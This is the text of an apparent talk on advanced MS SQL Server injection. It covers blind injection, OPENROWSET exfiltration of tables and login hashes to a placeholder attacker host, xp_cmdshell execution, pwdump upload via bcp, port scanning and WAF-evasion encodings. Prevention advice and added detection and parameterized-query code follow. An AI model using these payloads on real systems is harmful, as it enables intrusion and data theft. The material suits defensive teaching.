3. Credit
Cesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabs
o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israel
o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
4. SQL Injection Basics
• Dynamic construction of SQL queries
"SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
• Unsanitized user input
uname = ' or 1=1-- => SELECT * FROM table WHERE user = '' or 1=1--' AND pwd = ''
• Excessive permission
o Web services running as privileged user with db_owner rights
o Connecting to database using sa, dbo, or sysadmin accounts
o Lax file system permissions
9. Advanced SQLi Techniques
• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion
11. Blind SQL Injection
• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
12. Blind SQL Injection (cont.)
• Database Management System Fingerprinting
o System Functions
• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
o String Concatenation
• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
o Query Chaining
• MS SQL Server, MySQL = allows chaining with semicolon
• Oracle = does NOT allow chaining with semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --
13. Blind SQL Injection (cont.)
• Timing Attacks
o Adding delay
• SQL Server = WAITFOR DELAY '0:0:10'
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
• PostgreSQL = pg_sleep(10)
• Oracle = Union with query that contains a lot of results
o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
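Added example, not from the deck: a log review script that looks, in constructed Apache-style access log lines, for the probes the Blind SQL Injection slides (11 to 13) describe: the "and 1=1" / "and 1=2" differential pair, the fingerprinting functions and the delay functions, using the logged service time to note when a delay actually fired. The log format (combined with %D appended), the function names and the addresses are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: Apache combined format with the request's service time
# in microseconds appended (LogFormat "... %D"); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2012:10:00:01 +0000] "GET /posts.php?id=2 HTTP/1.1" 200 5120 1200
203.0.113.7 - - [10/Jul/2012:10:00:03 +0000] "GET /posts.php?id=2%20and%201=2 HTTP/1.1" 200 310 900
203.0.113.7 - - [10/Jul/2012:10:00:05 +0000] "GET /posts.php?id=2%20and%201=1 HTTP/1.1" 200 5120 1100
203.0.113.7 - - [10/Jul/2012:10:00:09 +0000] "GET /posts.php?id=2%20and%20getdate()=getdate() HTTP/1.1" 200 5120 1300
203.0.113.7 - - [10/Jul/2012:10:00:20 +0000] "GET /posts.php?id=2%20WAITFOR%20DELAY%20'0:0:10'-- HTTP/1.1" 200 5120 10004500
198.51.100.4 - - [10/Jul/2012:10:01:00 +0000] "GET /posts.php?id=3 HTTP/1.1" 200 4800 1000
""".splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} \S+ (?P<us>\d+)$')
# Fingerprinting and delay functions named on the slides, matched case-insensitively.
PROBE_RE = re.compile(r"\b(getdate|now|sysdate)\s*\(|waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(", re.I)
# Trailing "and 1=1" / "and 1=2" as used for differential analysis.
TAUTOLOGY_RE = re.compile(r"\s+and\s+1\s*=\s*(?P<rhs>[12])\s*$", re.I)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {"ip": m.group("ip"), "path": parts.path, "us": int(m.group("us")),
            "params": parse_qsl(parts.query, keep_blank_values=True)}

def find_probes(lines, slow_us=5_000_000):
    """Return (client ip, reason) findings; slow_us marks responses that took long
    enough to suggest a delay function actually fired on the database."""
    findings, seen = [], defaultdict(set)   # seen[(ip, path, param, base)] -> {'1', '2'}
    for rec in filter(None, map(parse_line, lines)):
        for name, val in rec["params"]:
            if PROBE_RE.search(val):
                reason = "dbms probe in %s=%r" % (name, val)
                if rec["us"] >= slow_us:
                    reason += " (served in %.1fs)" % (rec["us"] / 1e6)
                findings.append((rec["ip"], reason))
            t = TAUTOLOGY_RE.search(val)
            if t:
                key = (rec["ip"], rec["path"], name, val[:t.start()])
                seen[key].add(t.group("rhs"))
                if seen[key] == {"1", "2"}:   # both halves of the pair observed
                    findings.append((rec["ip"], "differential 1=1/1=2 pair on %s %s=%r" % key[1:]))
    return findings
```

Run `find_probes(SAMPLE_LOG)` to get three findings, all from 203.0.113.7; a single "and 1=2" request on its own raises nothing, which is why the script keys on the pair.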
15. Linked and Remote Servers
• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' ).DatabaseName.dbo.TableName
16. Data Exfiltration
• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
17. Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects ')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
18. Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
19. Privilege Escalation
• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not required
o Connection strings using SA, dbo, sysadmin
o Web service context
20. Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
21. Uploading Files
On attacker’s server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
23. Internal DB Server Exploration
• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
24. Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
26. Firewall Evasion
• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
27. Log Evasion
• Inject using POST parameters
• Long HTTP requests
o IIS truncates requests longer than 4097 characters
o Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
28. WAF Evasion
• Comments
o # = single line comment
o -- = single line comment
o /* */ = inline, multi-line comment
o /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New line
o %0D%0A = URL-encoded newline
o %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
29. WAF Evasion (cont.)
• Character Encoding
o Unicode (U+02BC = ʼ)
o CHAR()
o Hexadecimal
o URL-encoding
o Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
30. WAF Evasion (cont.)
• Concatenation
o EXEC()
o Split/Join
o Special Characters (e.g. '*', '+', '%', etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
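Added example, not from the deck: a normalization pass of the kind the WAF Evasion slides (28 to 30) imply a filter needs before signature matching: repeated URL decoding against double encoding, stripping of /**/ and /*! */ comments, folding of %0D%0A and %0B, joining of repeated parameters the way the slide says ASP/ASP.Net does, and dropping a stray '%' as in FR%OM. The function names, the three-signature set and the sample query strings are constructed for this example; it illustrates the idea and is not any real WAF's logic.

```python
import re
from urllib.parse import unquote, parse_qsl

def decode_fully(value, max_rounds=3):
    """Repeat URL-decoding until the value stops changing, so a double-encoded
    %252f ends up as '/' just as it does after the WAF and the server both decode."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def join_split_params(query_string):
    """Split/Join: the slide states ASP/ASP.Net joins repeated parameters with ',',
    so the filter must inspect the joined value the application will actually see."""
    merged = {}
    for key, val in parse_qsl(query_string, keep_blank_values=True):
        merged[key] = merged[key] + "," + val if key in merged else val
    return merged

def normalize(value):
    """Undo the encodings and comment tricks from the slides, then upper-case."""
    value = decode_fully(value)
    value = re.sub(r"/\*!\d*(.*?)\*/", r"\1", value, flags=re.S)  # /*! */: MySQL runs the body
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)           # /**/ dropped: UN/**/ION -> UNION
    value = re.sub(r"%(?![0-9A-Fa-f]{2})", "", value)             # stray '%': FR%OM -> FROM (not SEL%ECT, where %EC is a valid escape)
    value = re.sub(r"[\r\n\x0b\t ]+", " ", value)                 # %0D%0A, %0B -> one space
    return value.upper().strip()

# Deliberately tiny signature set for the demo; a real WAF carries far more.
SQLI = re.compile(r"\bUNION\s+SELECT\b|\bOR\s+1\s*=\s*1\b|\bSELECT\b.+\bFROM\b")

def is_sqli(query_string):
    """True if any joined, normalized parameter value matches a signature."""
    return any(SQLI.search(normalize(v)) for v in join_split_params(query_string).values())

if __name__ == "__main__":
    # Constructed query strings mirroring the slides' evasion examples, plus a benign one.
    for q in ("id=2+UN/**/ION+SEL/**/ECT+*+FROM+users",
              "id=2+UNION%0D%0ASELECT+*+FROM+users",
              "id=2+UN%252f%252a%252a%252fION+SEL%252f%252a%252a%252fECT+*+FROM+users",
              "id=SELECT+name&id=password+FR%OM+users",
              "id=2&page=1"):
        print(is_sqli(q), q)
```

Without join_split_params the split case is missed, since "SELECT name" and "password FROM users" each look harmless on their own.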
33. SQLi Prevention
• Sanitize User Input
o Normalize Input
o Whitelists
o Built-in Functions
o Regular Expressions
o Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries
• Stored Procedures
• Accounts with Least Privilege
• Enable DisallowAdhocAccess registry setting for MS SQL Server
• Perform Self Assessments
• Use a Web Application Firewall
• Filter Outbound Traffic at Firewall
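Added example, not from the deck: the dynamic query from the SQL Injection Basics slide (4) beside the parameterized form recommended under Prepared Statements/Parameterized Queries above, run against an in-memory SQLite database so the bypass and the fix can be compared on the same input. The users table, the alice row, its password and the function names are constructed for this example; uname and pword are the slide's names.

```python
import sqlite3

def make_db():
    """Constructed sample data: one account whose password the caller does not know."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return con

def login_dynamic(con, uname, pword):
    """Vulnerable: the string concatenation shown on the slide. The input becomes
    part of the SQL text, so a quote in uname closes the literal and the rest is
    parsed as SQL (the -- comments out the password check entirely)."""
    sql = "SELECT * FROM users WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
    return con.execute(sql).fetchall()

def login_parameterized(con, uname, pword):
    """Hardened: placeholders. The driver sends the values separately from the
    statement, so the same input is compared as data and never parsed as SQL."""
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return con.execute(sql, (uname, pword)).fetchall()

if __name__ == "__main__":
    con = make_db()
    payload = "' or 1=1--"   # the slide's example input
    print(login_dynamic(con, payload, ""))        # returns alice's row with no password
    print(login_parameterized(con, payload, ""))  # returns []
```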